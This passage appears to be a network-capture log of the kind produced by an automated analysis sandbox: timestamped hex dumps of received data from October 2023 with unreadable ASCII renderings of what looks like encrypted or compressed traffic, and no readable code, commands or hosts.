                                                                              Data Ascii: )k(AV@v:tQh\b^8{Nb*br[]8i,~0JfxX#.ePeCkxu9@wERp#tU|h6<q]t$bL{'<qrcanX=U|Aa\r@
                                                                              2023-10-26 07:45:58 UTC163INData Raw: dc e2 d4 e4 44 23 2e a3 45 38 50 f2 66 fe f1 b6 5e 6b 55 f9 10 eb 88 02 8d 81 96 96 bf d7 73 48 17 e9 b4 58 8d a3 b2 e1 fe 2f 86 04 6b f8 d5 a1 4a d0 8d 3e dc 53 68 d3 0a 0a 66 08 cb 2f a9 6a ef 01 c6 91 ca 58 97 00 da 02 7c c7 13 44 b4 54 8c 5c d4 4d 2b 71 8c a9 83 a8 f4 b7 e9 0a 94 0f 05 38 63 42 0c 38 b4 ed 08 7d 45 05 00 12 82 fc 4e 58 db 6f 8f 0b e2 c4 d6 13 73 e7 de 26 ff 32 62 78 4c f7 7b 0a ef c9 74 48 d2 e1 79 dc 54 9f ba 57 a0 e1 86 30 ce 21 72 2c f4 c1 7a 6c ac f8 0b ec 67 18 cb d7 94 45 53 85 ef c1 d4 37 7f 79 d3 54 ef ad a9 50 41 11 f5 c2 fa a1 bd 6b be 20 6c 57 c5 83 68 18 aa 0c 1c 38 d4 df bb db 34 fe aa 8e 72 28 8b 38 bd d8 d7 6e b4 00 eb b7 65 98 92 db 71 60 df f4 6c eb cc e7 64 62 b9 54 f3 b1 5f dc 93 6a 84 22 04 22 7a f9 8d b5 4a 46 5c
                                                                              Data Ascii: D#.E8Pf^kUsHX/kJ>Shf/jX|DT\M+q8cB8}ENXos&2bxL{tHyTW0!r,zlgES7yTPAk lWh84r(8neq`ldbT_j""zJF\
                                                                              2023-10-26 07:45:58 UTC167INData Raw: 04 ac 0f be 61 f4 e2 5d 29 03 4d c5 3a 04 72 97 db b4 6b 6b 1f cb f5 82 18 16 db d6 57 af d9 7a cb bf 9b c1 a3 d4 90 79 f1 94 c0 aa 60 8f ff c1 77 b0 92 f1 f5 f0 7d 93 92 33 a2 f6 6a 54 a7 71 ca 73 4e ab 77 96 04 5c 7e b7 ac 7e 66 64 53 69 f3 cf cc 54 34 23 ae 8a e5 70 d3 ca 7b eb ce 6f 70 ea a5 0f 39 1a 39 c7 4a ec 52 02 71 6e 24 0a 8f 75 de 59 6e f0 e1 cd 31 22 c2 15 8c b2 73 ed 5f 4e c2 b2 be f4 4a 7a 18 02 6f 20 88 00 36 0a 17 d2 a4 f7 3d 22 ff bc b7 a3 7b e8 0e a8 a1 05 f8 70 65 6f f6 12 a9 72 00 14 ad ac a7 94 11 7b ec f2 fa bf 27 54 97 36 c0 14 f2 ae 8a 97 fe 0b 7c b4 d3 d0 39 61 04 82 31 14 bb 02 18 18 ad 6a 78 c5 ae 7e e5 e1 de 00 29 98 66 99 f1 6d 79 6e b8 13 e2 6d 18 04 a9 5f 44 70 42 dc 1d ac 60 aa 79 4a fc 7e dd 40 62 0e 98 b2 e7 ca 79 c5 99
                                                                              Data Ascii: a])M:rkkWzy`w}3jTqsNw\~~fdSiT4#p{op99JRqn$uYn1"s_NJzo 6="{peor{'T6|9a1jx~)fmynm_DpB`yJ~@by
                                                                              2023-10-26 07:45:58 UTC171INData Raw: 1a 50 eb d7 82 8a c4 1f 9e 6a 15 2d 05 e8 e7 c0 01 e2 22 11 ea 22 2b b8 b6 fb 74 1c b8 81 91 db df 6a 81 19 74 89 79 ae b4 e2 65 26 bb f4 94 38 74 58 f7 c8 33 b6 c1 ff 8b 6f aa d7 ba c8 71 86 00 36 06 84 c8 aa e2 df 1f 12 cb 77 6f c0 aa d6 8d 59 bc 7a f0 f2 c0 0f ce 68 44 b1 94 c2 1f 39 17 f4 8d 4f f0 c1 92 96 5c c2 f1 ec dd 7d a5 9f 54 a3 fc 26 f0 f0 d0 79 89 4f 4b 58 77 82 7f da ef 59 89 1e e8 8a f1 d7 8f 37 eb f7 b1 bd 95 28 65 20 cb 7a 8c bd b8 4a 2e e2 e8 dc 6a c1 af de 89 e4 6a 7f 0a c1 4f 18 5c f5 fe 2d 46 fe 12 d9 12 22 fa ed 7d a2 df 2e 05 46 0b fc fa bd 9e e1 8b e2 e9 71 9c c1 c4 0f c3 5a ea f7 b9 0e 6a 07 c0 01 df e8 4e 9a f1 84 cf 05 0c c7 f4 41 91 1f ab 04 b2 e7 f4 72 c2 b8 6d f3 0a 58 a5 55 7f e4 05 42 eb d5 5d ca c0 87 bb 6a 2c b8 84 e7 a9
                                                                              Data Ascii: Pj-""+tjtye&8tX3oq6woYzhD9O\}T&yOKXwY7(e zJ.jjO\-F"}.FqZjNArmXUB]j,
                                                                              2023-10-26 07:45:58 UTC175INData Raw: 19 e1 b7 d7 e4 7f 6e 3b b6 e9 aa 16 73 07 f7 d6 70 54 05 a2 8e 5f 0a 9d 26 02 6a 5e b1 f9 14 a8 03 62 a9 f4 a7 10 0a 24 bc 21 bf 79 0b c7 78 6d bc 0d 0f 25 86 d2 2a 1b 76 50 3e 5a 54 c4 a9 40 96 cb ea 2e 14 a3 0d 56 9d ef ea dd 4c 7f 4e b9 78 12 6b 56 cc da 56 a5 a6 5f d8 b7 4a 03 0b 4a 54 be dc 57 7a 90 3f 46 94 85 fe 68 b4 fc bc 67 74 d8 82 f8 bc d6 8a 48 34 bf 5a 78 de 58 b2 48 f9 21 96 78 94 ef fa a8 92 de 2a d4 f4 53 92 a2 1c 02 95 04 34 d8 b6 a3 94 eb 93 be 34 a2 8d db 70 2b 6b df 32 22 43 65 5e 22 69 51 a4 0f 00 6b 8e 84 5c b8 cb e3 e8 09 f6 b1 5a d8 f3 5e a6 33 47 6f a5 3e 7c 98 6f 38 14 f9 ca 78 73 88 47 ff 8c 02 b9 67 34 d6 5a 98 b6 e5 85 58 ef c0 0a 3f 6e 62 4a 07 c6 07 82 2f 64 02 b3 ff 14 8e 5a 58 b4 b9 fb 16 df 8e b6 3c 4c 42 5b 18 b8 e5 0a
                                                                              Data Ascii: n;spT_&j^b$!yxm%*vP>ZT@.VLNxkVV_JJTWz?FhgtH4ZxXH!x*S44p+k2"Ce^"iQk\Z^3Go>|o8xsGg4ZX?nbJ/dZX<LB[
                                                                              2023-10-26 07:45:58 UTC179INData Raw: 59 fe 9f 97 6d 8a e7 ab 01 96 b9 34 0a d5 da 74 8e 80 38 07 ac 88 b8 b3 03 e9 fe 84 a1 4d d8 70 8c ad dd 99 74 8a df d3 c1 58 22 13 82 9a f5 05 48 8b 42 1d c2 ba 51 bf fc b7 36 68 3b 8b ac bb 21 bb 26 7b 02 46 ec 94 df 71 58 1f 63 0a 2c 41 f9 02 78 75 01 64 cb 86 6d 8a 0e bb c1 07 12 ef 61 b2 de 32 a2 5f 4d 6c 02 d1 67 8c 22 54 7c 2d 82 8e 6d 2f 9a 93 c1 34 d5 2a ed 3f 22 10 0c d4 40 36 f8 09 46 eb 47 43 e2 2a db 06 ca 12 3e a2 8e 0c 9b c4 a1 af db 51 c2 a2 1d de b1 58 93 0f e2 86 58 f4 97 7a 5b c9 e1 ad e4 65 8d 6a 78 f4 0b f9 14 7a 80 11 90 79 81 d1 d6 2a 22 e7 6b 44 e2 32 a5 91 30 90 5a 64 42 86 2e 6a bc 06 58 bb c1 f6 db 08 c9 08 8f 9f 9e fb db 94 0c 73 11 b1 9c 8a d0 d4 ab 48 18 e0 aa 64 f8 17 f8 60 f8 28 42 6b 5b bd f8 03 12 76 4e 40 1c 9a a2 93 ee
                                                                              Data Ascii: Ym4t8MptX"HBQ6h;!&{FqXc,Axudma2_Mlg"T|-m/4*?"@6FGC*>QXXz[ejxzy*"kD20ZdB.jXsHd`(Bk[vN@
                                                                              2023-10-26 07:45:58 UTC183INData Raw: a6 aa 53 f8 a9 f9 ca 36 98 02 75 10 52 fe 6b 07 a7 95 6a 71 66 bf c5 77 34 a4 f7 91 d2 61 ae e6 86 68 5b 21 91 8a db 88 79 f0 f0 f7 63 c2 ea ef d6 f5 96 0f 72 df c2 b7 f9 92 fe 3c 62 b6 0a 71 96 fb ba 97 5f 3c 0b 50 61 c7 8a 57 c8 ac 24 5a f0 0d 65 05 85 14 8b f8 eb d2 da 25 be 10 f0 e3 fa f9 c9 cd 94 82 6a 9f d4 a1 7c 07 44 82 82 98 b6 de 92 18 0f ae 2a b8 83 11 3e 67 34 02 3e 33 4c 3e d7 e4 f0 9d 8e d7 24 82 59 25 81 b8 7e ac c1 d8 a0 b7 0d e5 ca ad 94 62 9d 54 40 b7 b4 ec a3 ff 89 56 8e 82 2a e8 8f 7d cc f1 b9 8d 86 38 32 7e 4c df b4 e1 73 d6 f0 06 10 79 6c d5 7f f8 f4 bb a2 63 72 bf 4a b8 66 8c 6e 33 5f 4a 0b f0 6b e4 c5 1a 85 07 9e 70 f4 a4 aa 7a b4 d8 fa 4d 9b 05 47 e5 74 b1 55 18 ef c4 b1 69 4f 99 86 f8 f4 b3 3d 44 b6 49 57 18 b9 3d 8b d8 8d f9 de
                                                                              Data Ascii: S6uRkjqfw4ah[!ycr<bq_<PaW$Ze%j|D*>g4>3L>$Y%~bT@V*}82~LsylcrJfn3_JkpzMGtUiO=DIW=
                                                                              2023-10-26 07:45:58 UTC187INData Raw: 92 dc 15 db c2 81 c8 2a 74 e0 78 4d 40 02 e3 f1 74 57 6e 4d d7 c1 0a 78 5e b1 6d d5 94 8a 96 b8 0d e9 6a cc 94 d4 61 e3 54 02 75 f1 fc 12 d4 48 34 6b 0f b6 3d e9 0a 85 3e b7 29 44 e0 81 ec 8e bd 67 63 b8 14 53 77 a3 f2 8b c5 91 f4 be 29 38 88 80 90 78 54 e8 eb 1e fc 00 a7 2e d9 ac 80 cb 14 65 38 18 6d 42 ee 1b 50 a6 5e 0f ef 63 88 d3 ef 21 75 0a 0f 42 41 7a b4 f0 de ca 96 22 1d e0 54 56 8d 14 34 ec 80 98 a3 da d8 f1 a7 9f ea 71 98 f6 6a f3 87 e0 c4 57 e0 ec ca 57 94 bb 67 d0 74 57 83 d0 54 f7 be f7 77 e0 6a 01 92 06 6b 3a 62 82 5a 8b e6 e4 c8 91 6e c2 74 26 bd be 89 d8 74 e0 84 ef 33 82 58 f8 74 52 6a 16 f8 b7 88 3c 81 00 5a d8 ec c2 6a 0f 96 d7 c5 7d 14 e3 6a 8d f0 d5 b9 17 05 90 ef 0d 68 58 e8 77 75 ff 68 b8 5f d4 9d cd 54 5f 67 18 47 18 a6 ad d4 5f e7
                                                                              Data Ascii: *txM@tWnMx^mjaTuH4k=>)DgcSw)8xT.e8mBP^c!uBAz"TV4qjWWgtWTwjk:bZnt&t3XtRj<Zj}jhXwuh_T_gG_
                                                                              2023-10-26 07:45:58 UTC191INData Raw: 2d 4d b8 b5 b4 ef 57 93 d0 aa 03 d4 cb ea 6f 94 bb f2 7e 9a 0a a7 ea 14 eb 6d 12 41 22 d8 db 73 62 86 2a f3 df 91 89 6b b5 d6 b7 2f de 7a 94 34 d4 44 ed 74 b2 0a e3 72 c4 6a 7c 45 8b 62 d8 70 a2 bc 75 67 8f 6a f8 17 82 5c b0 f4 db ae 16 e8 9f 39 19 14 07 d2 55 b9 a1 7a 02 14 ba 0a 3a 95 84 d5 5b 96 00 cb 04 92 11 cf f7 9b a2 90 64 b4 d8 68 18 88 bc 2a 38 cc f0 ae 0e 8a fb aa 8b 95 82 16 02 14 a6 b7 08 54 e5 91 70 cf fe 58 38 a5 1f cb cf b4 a1 d3 d6 db e2 69 5b 74 64 8e 48 00 62 88 5f e8 8e 11 18 b3 41 c3 49 d4 7f a9 17 66 90 fd 37 9e 21 78 18 a0 c1 5f ba 74 58 df 48 96 42 2f c2 f7 6a 73 77 94 2a 7f 63 ec fc b8 b7 ed 10 5a 98 ec c4 a9 6a 73 f5 6a df 4e 82 5b a2 f4 ac 59 2d b4 da ca 78 74 08 d7 78 e9 0f ea 7f 97 30 93 18 34 6a 61 2f 8c 26 86 ea 54 8f 77 2c
                                                                              Data Ascii: -MWo~mA"sb*k/z4Dtrj|Ebpugj\9Uz:[dh*8TpX8i[tdHb_AIf7!x_tXHB/jsw*cZjsjN[Y-xtx04ja/&Tw,
                                                                              2023-10-26 07:45:58 UTC195INData Raw: ee ef cc 21 f3 72 68 d0 f1 ed 5f e0 96 f8 14 c5 6b 0a 80 5f 99 f2 8d 71 92 f5 22 63 ea 7e e0 0a cd 67 f4 5c e9 8c 6b cc 86 e6 76 dd 3a 08 81 66 85 d5 21 e9 72 f0 f4 03 ee 16 7e f2 5f 05 7c c2 6b 78 dc f8 c4 fc 9a fe cc f5 e4 e7 91 e8 a2 81 d0 f7 ca 7b af d5 1f 22 ed 46 e2 b4 6a 78 f9 6a 0f 19 87 0e 0a 49 0c 68 d1 fa 8f 0d e8 31 02 fb c1 d8 8e b2 bc 79 61 87 cb ff 6f 22 11 fa 4e b6 ce 37 31 28 7d 0e f6 e3 69 18 b4 7a 73 71 6c fe 8d 7f bf ec 0a 8a d4 49 eb 0b cd f3 ea 5d e0 90 ea 2f 54 67 e1 6f 86 e2 e6 e0 79 ee 7a d8 a8 5b b2 4f d4 e1 c5 2a 47 82 ca 15 c0 f2 57 b8 f2 9a d7 e1 cc 74 6d a6 83 22 0b 11 8f da 0a 56 9f ee 36 7f a9 d7 7a ff 93 eb e9 a1 9b 52 e0 ac cf 1c 4b 89 de e5 eb 19 88 04 74 04 04 11 86 01 96 54 2d f5 79 89 ea d7 ce f7 95 06 ac d3 ca fe 71
                                                                              Data Ascii: !rh_k_q"c~g\kv:f!r~_|kx{"FjxjIh1yao"N71(}izsqlI]/Tgoyz[O*GWtm"V6zRKtT-yq
                                                                              2023-10-26 07:45:58 UTC199INData Raw: a1 4b 91 3d 34 e0 ba 8a 5d 29 2b 33 92 c2 d9 6a a4 21 13 7e 8e 22 53 ef b9 b2 b1 f7 dc c2 ca fb 5a bd 8a 70 83 c6 48 0b c0 38 aa b7 02 63 8a 73 13 1f c7 17 60 a2 d8 df d4 71 ca 07 f3 e2 b3 22 f2 81 75 d6 97 33 eb 07 c8 03 ce c0 b4 aa ae 57 aa 8b 79 be 1b 82 0b 06 5c 22 e3 48 74 83 73 3a 6f 83 92 1c 61 63 87 ff f8 f0 f0 58 8b c6 6d 37 b9 09 7c 7c 9e f2 5f 18 c3 54 85 fd 64 e8 72 da dd be e5 50 6f b5 5c 00 94 62 5f e1 94 09 2f b8 b4 e4 80 5e 75 e6 ce 79 87 08 95 95 c6 21 d4 a7 82 e6 e7 14 6b 12 87 32 75 a4 78 ba c1 e8 63 20 34 56 6f ec 62 04 0f 52 d4 df da 0f 34 03 cb 29 17 e2 0c 25 f4 ea 6e 26 58 02 08 df ca fb 9a e4 71 5a e6 68 a0 21 df d1 ab c2 ca b6 85 73 2d 00 c6 4a cb 12 ba c7 ea 39 db ec c8 1c b4 8a 2a fa 04 6d 87 2f e4 eb b9 7b 83 da f5 76 1a 23 eb
                                                                              Data Ascii: K=4])+3j!~"SZpH8cs`q"u3Wy\"Hts:oacXm7||_TdrPo\b_/^uy!k2uxc 4VobR4)%n&XqZh!s-J9*m/{v#
                                                                              2023-10-26 07:45:58 UTC203INData Raw: b4 6e 3a e0 83 99 3c af 27 15 e9 12 bb ae 2e 78 e5 1e 0b d4 59 2d 8a 34 3b 0b 59 70 52 66 f0 92 d2 64 f0 95 d2 65 f0 65 a6 5e 5a 88 86 58 5f dc d1 6b f0 8e d3 6e 2c 70 d5 ca 71 6e cd 4a 31 ba c1 7a b8 17 55 54 24 70 d9 29 58 6d 69 b2 87 01 ea eb 30 d8 c1 0d 02 d5 ea aa 23 14 57 7e b8 67 12 c8 db 86 aa 0a 44 b0 a6 b2 d8 b0 c5 08 e7 e3 53 f2 f4 70 a7 ce c9 10 05 09 79 eb 5a f2 d3 7b 10 d9 ab e3 65 f2 e3 70 a4 df 59 cd a5 b6 ed 7b 06 d9 1b 10 c5 a5 b7 e9 b0 77 d3 70 9a 14 e9 8d 82 ea 10 88 ee e5 dc c0 81 91 04 b6 b2 0a d8 63 66 8e 34 d9 41 68 eb 79 6a 38 22 bc a1 10 c1 5f 16 b4 8a ce a1 ea 08 85 df e7 d8 ac ca 0a b3 68 41 71 42 94 a2 8b d7 7c d5 2e f9 94 c2 6d cd 89 63 6a 0f ea e2 c6 30 34 7f ca 2f 26 56 62 f5 7f 7a 0b 23 b5 cd ad 57 72 b8 e8 ac e6 59 60 f9
                                                                              Data Ascii: n:<'.xY-4;YpRfdee^ZX_kn,pqnJ1zUT$p)Xmi0#W~gDSpyZ{epY{wpcf4Ahyj8"_hAqB|.mcj04/&Vbz#WrY`
                                                                              2023-10-26 07:45:58 UTC207INData Raw: af be 62 70 45 4a c4 5d 6f 6a 90 78 d3 6a 17 83 d0 58 d7 cd f8 cb 3f bf f4 e1 30 8b db 60 e9 c7 eb bd e9 af f9 b9 f0 77 d5 f3 1d 15 c3 f8 28 7c d1 be 7d be d9 81 c1 e8 1d 71 bd 1e 9b 27 d5 13 74 17 d3 27 fc a2 b3 16 55 5f 0a 38 ea 92 ce 1a ec 96 c5 13 e4 67 b4 1e 73 bb ee 4d be 18 88 3e 4c 76 d7 65 42 77 42 61 b5 94 53 79 b4 88 e7 51 9f 41 e6 68 f0 9f 07 7f 09 ad 07 6e 94 7b 9c b4 f4 19 2d 3d 38 31 2a 38 22 55 30 ce b6 3c 2c 18 76 42 32 35 2a 2e 28 7c ac 25 1f c9 a8 89 30 8a c5 ce b5 83 20 a3 a7 bf cc bf af 97 ce c6 7a 15 f4 bd d3 4c 32 c6 c5 48 3b 4a d6 7b bc 73 34 d6 05 40 3b f8 17 63 26 e6 00 83 24 e2 08 42 2b d9 b2 78 e7 62 32 fb 0c 68 93 0b 04 ac 96 4c 06 52 fe d4 55 57 49 22 8b 5c 86 40 c3 50 f3 01 4e 5a 14 fc 53 6f fc 76 52 95 f4 8b 6f 73 ac 5a 70
                                                                              Data Ascii: bpEJ]ojxjX?0`w(|}q't'U_8gsM>LveBwBaSyQAhn{-=81*8"U0<,vB25*.(|%0 zL2H;J{s4@;c&$B+xb2hLRUWI"\@PNZSovRosZp
                                                                              2023-10-26 07:45:58 UTC211INData Raw: 8c ba 6d f6 8a b9 44 a0 a4 23 10 20 ea c2 f5 68 5f 5f 0c c1 66 61 1f ca e1 c1 5b c0 8e c2 64 0c 26 1c f4 c2 b1 d4 a9 1b d2 c0 83 5c ca 47 38 cc a8 9d 49 45 b5 ea ae 42 c9 61 f1 5f 26 bf 63 37 1f e7 78 e2 a1 d7 27 f5 51 b9 a2 c2 33 e7 1c dc cf aa 1f 13 75 fe 3e c1 61 b3 31 cd d0 c3 1a 7d b6 06 e6 96 5e 33 c4 b4 72 ba 54 02 b3 b1 29 b4 02 2f 22 30 ba 71 79 69 de 23 2b 1d 14 cc 9e 5b b6 98 af a9 ac 3a 5d c3 77 e9 e1 c4 07 82 29 0e 91 32 5f dc b2 16 8f cc ba cf 77 fa b4 92 d5 cd 54 e7 7a e5 72 be 5f 1c 23 43 93 30 80 ba 33 12 da e6 cc 28 e9 dc 0f e7 52 c2 99 44 e2 40 2b 4a 41 cc b5 26 69 28 a9 c0 39 53 fb 2f 18 73 0c c4 e9 f4 0e c3 48 55 3b 3a ca 29 f0 cc 59 f0 28 f7 79 b7 7c f4 c8 65 f5 63 a2 be 30 cc 9a 02 2d ce e1 63 28 71 de b9 dd 95 46 45 60 dc 36 6c 20
                                                                              Data Ascii: mD# h__fa[d&\G8IEBa_&c7x'Q3u>a1}^3rT)/"0qyi#+[:]w)2_wTzr_#C03(RD@+JA&i(9S/sHU;:)Y(y|ec0-c(qFE`6l
                                                                              2023-10-26 07:45:58 UTC227INData Raw: 22 79 60 e6 3a d8 f2 14 ba 01 68 7f 77 f4 88 06 74 03 0c 67 62 6b 72 fe 86 7a 57 de 61 59 87 0d 8b 8f 0f f7 d4 38 5c ed 73 83 5d fa ea 5b 61 c2 e8 70 ca 94 3e 93 3a 11 63 fb fd 68 67 bf 3b b4 e1 7a 89 c7 4e eb d8 ec ba aa 43 7e 7d de 17 b4 10 63 38 91 22 9b b7 54 ac 89 f8 8a 82 aa 35 93 e2 91 58 b4 98 89 f8 92 82 6a e3 91 e2 65 fa d4 0b 6e f8 7a e4 0a c7 6f e2 7a fa 14 14 6a f8 96 55 c1 68 92 83 fa c0 d4 c1 ca ef e4 dd df 19 f0 da 6a 7c d9 5f 17 f5 e2 01 ef 97 f7 06 32 b8 d3 25 0b 58 d8 45 d9 37 73 b6 d7 62 e9 e4 ef 17 39 66 33 04 34 c2 30 5a e0 c1 91 b8 56 86 e5 0d 74 49 0b 54 e8 d8 6d 86 b1 62 00 ee ff 57 fe c4 16 a5 76 02 72 83 a7 77 44 f5 0f 8a cc 81 3f cf 85 33 e3 e2 a0 1d 00 0b f5 73 d7 51 9e 28 fc ff e1 65 11 e0 08 83 94 67 11 6a e8 3b 0d 75 5b fa
                                                                              Data Ascii: "y`:hwtgbkrzWaY8\s][ap>:chg;zNC~}c8"T5XjenzozjUhj|_2%XE7sb9f340ZVtITmbWvrwD?3sQ(egj;u[
                                                                              2023-10-26 07:45:58 UTC239INData Raw: f4 a3 e9 ee ae 5c 52 0a ac b2 92 24 e1 01 29 d6 8e 64 74 e1 f8 7b 77 fc 27 62 32 0e e6 90 93 78 85 e8 e2 f6 7e e7 d7 57 ef 0c 91 f5 e5 f8 3a e6 03 d2 6e 79 74 ee a2 8e 72 b5 df b3 70 96 de 8b 71 c6 53 78 7b a4 8c db fc d9 76 8f b5 05 85 a0 34 68 a9 82 7a cc 2a 38 77 e2 e4 22 6a 17 29 00 7b cb b9 1e 34 a2 86 ff f1 aa ea 04 c2 f6 5b 72 b6 ec bf 2d 95 62 e3 31 88 cd 85 02 62 b2 44 ec c5 f6 03 04 dc fc 7a 23 f8 e6 ce d4 9b 22 77 fb 90 8a 32 7c 70 b1 e7 fa d6 d2 2a 17 85 12 f4 65 e7 b1 89 f4 b4 8f c7 60 71 07 be 37 ce 62 d7 6a e4 d7 ed 17 ee 71 42 df 1a 6e 64 25 79 59 a1 75 e5 61 c1 0a f0 8b 5d 8e 3e ea 06 36 ef 61 ba dd 64 5c f7 0b e9 b2 74 7a a9 54 fc 14 f1 2b 4b f8 1c f3 d8 08 17 ed 68 f8 ca 34 2b 40 5f ea ea 40 ee 8d b7 e8 72 67 85 08 d4 61 6d 04 aa 59 f5
                                                                              Data Ascii: \R$)dt{w'b2x~W:nytrpqSx{v4hz*8w"j){4[r-b1bDz#"w2|p*e`q7bjqBnd%yYua]>6ad\tzT+Kh4+@_@rgamY
                                                                              2023-10-26 07:45:58 UTC255INData Raw: d7 e1 ea 4f bb 07 97 8a 7a 69 72 f7 a5 f5 36 78 93 c9 87 6f f4 a4 5d e9 84 e3 71 0f 63 67 cf 6d 52 be a8 96 74 22 aa d3 89 62 ad 79 71 94 8a 6f a0 d7 eb d1 7f 58 6b fc e4 74 a0 f0 8e 62 d9 03 6a ec bb d2 83 a8 e9 86 94 a4 8d 51 a5 e8 50 38 74 c2 9c 89 08 aa 6c b9 54 f4 0b a4 70 0f fb dd 03 a2 62 46 14 3e bc 72 b0 7e a1 ed a7 51 0a e4 0d ae 75 7c f4 92 7d 6f 68 e8 73 1e 0b 83 41 f9 c2 03 e4 d4 18 31 c5 59 94 e9 c9 17 85 92 8a 53 49 b7 aa 38 9c 65 88 73 eb 8f b3 4b f4 21 e9 1c 89 b3 0b 2b 4d 88 b2 68 34 0f 28 98 7c 5d 63 fe 0e db 9a b7 05 3f eb cf d6 ff f2 f6 62 ec bd 7c 0f 36 c6 46 0a 24 6b 4b d4 81 ad 70 f3 f9 ba ec ea dd 6e 08 14 02 77 7a 84 66 75 0e 7a c7 6a 98 e5 f4 81 e5 e6 f9 b0 7a e2 cc f4 b7 bf 41 fc 40 70 7e 39 ae 82 87 7a 34 52 c2 d9 97 9b 4b 0a
                                                                              Data Ascii: Ozir6xo]qcgmRt"byqoXktbjQP8tlTpbF>r~Qu|}ohsA1YSI8esK!+Mh4(|]c?b|6F$kKpnwzfuzjzA@p~9z4RK
                                                                              2023-10-26 07:45:58 UTC271INData Raw: a4 21 21 95 15 fb 52 a2 31 24 8d 04 b0 81 aa ed 17 78 80 4c b4 6b 82 34 94 52 92 55 09 b6 ea 75 1a 96 2e a0 83 e2 8a 04 c9 80 d7 3e 8a 89 f1 17 62 1f ee d7 9c e2 78 4a 97 7f ea 98 1c e2 fc 9a 19 ab fd 0e 9d 08 cb 1e 42 a8 7b 38 74 84 6e 07 cc e1 f1 e7 ba 71 b4 47 74 88 0a 08 d4 6b 02 50 54 53 88 59 db d4 bb d6 f4 c1 89 47 16 ad 80 7c ff 47 12 23 14 29 c2 42 f0 21 90 78 61 d0 03 48 8a 48 43 5f 17 b9 bc 97 ed 04 98 52 19 65 aa a7 0c 46 b2 58 f0 21 8b 79 6b b7 f9 3c d4 81 3a 78 02 93 01 96 87 91 7f f8 d0 96 aa db ef 81 ab b7 c3 21 8b 4e f9 89 b1 e2 10 67 5f 30 62 22 0a 45 be e1 aa 18 12 97 87 ac 56 89 07 39 c0 e1 f1 d0 a0 b6 69 c1 10 35 02 69 34 14 cb 80 08 32 44 a0 7f ef e2 1a 15 9d f4 92 11 4f 00 d8 14 0e d9 39 0a af e8 c3 5c 73 10 91 14 52 f9 d7 56 62 60
                                                                              Data Ascii: !!R1$xLk4RUu.>bxJB{8tnqGtkPTSYG|G#)B!xaHHC_ReFX!yk<:x!Ng_0b"EV9i5i42DO9\sRVb`
                                                                              2023-10-26 07:45:58 UTC287INData Raw: c1 e8 02 71 60 f1 ea 9c 96 0a c0 b5 8b c0 49 40 ed 21 eb 7a 26 ee be 67 df 52 e3 0c e0 8e ad 8f 87 e1 6b 14 c4 11 09 b4 98 70 4a 3e 3f 81 eb cb 40 82 2c b3 95 bd ea e4 7b 83 d8 4e 80 be 2a 27 84 62 f7 43 8d 76 83 88 03 ee f4 00 15 cc d9 b6 c0 41 1a 76 53 b0 fa 84 39 d8 43 b8 13 99 4e dc 68 e4 b7 e1 f4 18 52 a5 1b 38 65 16 9b 62 43 a9 48 72 8a 3c 1c c2 eb ee a0 82 36 54 b4 8a 13 b7 53 7f 3b dd 74 cb 75 1d 54 c3 fe 8b dd 56 32 45 f5 dd f9 d7 c8 78 1a 0c 19 58 81 70 51 6d c2 5c 73 79 98 97 67 3e 32 3b 08 aa 5b f8 61 fe e9 a8 06 48 47 22 69 7e 74 12 e2 ab 66 7d 12 2b f6 ba 6c 49 7b ba d0 e3 ee 26 05 db 6b 48 6f e7 ea fd 2a 2c 7c 57 01 62 90 6d 57 8f a2 9b b0 fa ea f7 fd 75 1f 0d ee cb ce 53 49 06 77 63 08 07 ec be ce 72 1a 18 06 37 66 33 f4 2d d5 96 69 ff 42
                                                                              Data Ascii: q`I@!z&gRkpJ>?@,{N*'bCvAvS9CNhR8ebCHr<6TS;tuTV2ExXpQm\syg>2;[aHG"i~tf}+lI{&kHo*,|WbmWuSIwcr7f3-iB
                                                                              2023-10-26 07:45:58 UTC303INData Raw: 78 c7 35 ad b3 c3 79 c3 f4 c2 0f d5 39 28 e0 6f 63 4e 81 77 44 08 0a 01 14 cf 55 88 70 89 ea 83 64 fe 88 1d 74 57 74 78 01 65 fb 6d 00 f6 cc f8 6c 24 eb 42 29 ad ca 10 d0 b6 d4 77 c7 e5 4a d9 32 38 ed 7e f3 9a 5d fd a7 e3 9b ff 3f 8b 2a b4 52 62 84 46 e3 f6 58 17 d1 55 ea fa fd f9 b9 f1 04 83 57 78 47 12 ad 78 a1 ed 5e 56 f4 36 de b4 81 20 ab d0 8a 63 6c 5e 62 c6 a5 ad fc 14 78 12 8b f4 fe b7 7d 0e eb 06 f7 51 e2 b7 97 d7 a1 77 a5 be 44 a5 22 83 f6 17 e6 a2 b6 52 34 49 72 da 10 ad 9c 78 88 34 e8 9a 87 33 07 ac ec 5f ea 2b cb 7e f0 3f 05 94 76 78 3d b7 20 e7 aa 28 74 b1 f6 eb 86 08 d9 21 52 9f c8 66 6f 78 8d 2a 47 fb 51 cb 05 fd f4 db 17 22 b3 36 0f cf 93 62 b9 df 9b 3f af 1d b1 af ea 09 65 73 3f 28 42 4c f1 72 bf 9e 84 62 73 de 54 83 c1 45 ca aa f4 39 d7
                                                                              Data Ascii: x5y9(ocNwDUpdtWtxeml$B)wJ28~]?*RbFXUWxGx^V6 cl^bx}QwD"R4Irx43_+~?vx= (t!Rfox*GQ"6b?es?(BLrbsTE9
                                                                              2023-10-26 07:45:58 UTC319INData Raw: 2e bd db 77 89 35 c4 4b 36 5b 41 88 f1 4f 00 6c 6c 1f 5c c3 77 32 ce 20 1d 4e e3 77 5a 85 26 1a 63 7c 3a e6 ef 99 77 2d a9 23 6b 2d 77 b6 69 98 ba 6f 2d a9 4b 69 ea 98 f1 b8 38 4f f4 5d c8 3e 01 57 01 8b 92 62 ee b3 6c cc 3e bb dc f1 a6 e9 47 7b 80 f8 e2 37 9c 38 a9 7a 6c 7c 17 bd 00 a5 df e1 7f d8 2f 2e eb e1 a1 49 9b 7a db e2 55 62 f7 25 68 cd cc 19 f8 ca 44 02 f1 00 94 38 b7 d6 f4 bd 79 74 a1 ef fd 40 78 62 2a 52 af 28 bc 8b 4e cb ea ea 1f 6f d0 d4 84 55 83 7b 4b 08 28 fa 82 d5 79 44 90 41 63 21 6b ff ea e8 23 59 2f d4 40 b5 f4 77 46 0d 10 4b cc ec 62 bb f4 9f 49 8f 3c 33 e9 ca 10 6b 76 b7 a3 3a 6c 2a a1 f1 63 08 80 44 ed 72 9c 4b 35 b4 e8 63 ae 37 10 bc dc 41 b4 86 ec ae f4 d2 9d 61 f8 14 8e 25 8b 60 be 07 87 27 20 6e 83 4d eb 3f ae 33 57 9a be 6f f2
